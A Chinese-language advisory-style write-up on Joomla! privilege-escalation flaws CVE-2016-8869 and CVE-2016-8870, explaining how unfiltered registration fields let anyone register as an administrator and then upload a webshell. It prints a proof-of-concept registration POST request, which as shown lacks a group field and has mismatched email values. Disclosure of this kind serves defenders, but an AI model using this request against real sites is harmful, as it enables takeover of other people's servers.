Joomla!用户特权提升漏洞影响范围分析:涉及全球超15000网站
一、详细说明:其中包括情报涉及的人员、利用点、利用方式等
漏洞影响
影响的Joomla!版本:3.4.4至3.6.3
漏洞原理与危害
该漏洞主要因为有两处注册代码,其中一处没有判断是否关闭注册功能,导致网站关闭注册情况下仍可以进行注册。
在注册时,由于程序在处理的时候没有过滤用户发送的数据字段,导致用户可以直接添加用户组字段。如用户添加管理员组字段,则可直接注册为管理员账户。
用户添加管理员后,可以在后台进行webshell上传等操作。黑客可控制和篡改,甚至删除网站,同时导致数据被泄露等后果。
二、问题证明:
漏洞POC
POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: [Joomla!系统地址]
Referer: [Joomla!系统地址]/index.php/component/users/?view=registration
Cookie: [网站Cookie]
Connection: close
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[name]"
baimaohui
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[username]"
baimaohui
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password1]"
Baimaohui
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password2]"
Baimaohui
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email1]"
baimaohui@baimaohui.net
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email2]"
email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="option"
com_users
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="task"
user.register
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="[这里是Token]"
1
------WebKitFormBoundarydPTNyMPMzmAhBsf4--
CVE编号
CVE-2016-8869,CVE-2016-8870
参考:
[2]https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html
[3] https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html
[4] http://www.exploitalert.com/view-details.html?id=25143
[5] http://paper.seebug.org/88/
[6] http://weibo.com/ttarticle/p/show?id=2309404036736568153758#_0
最新评论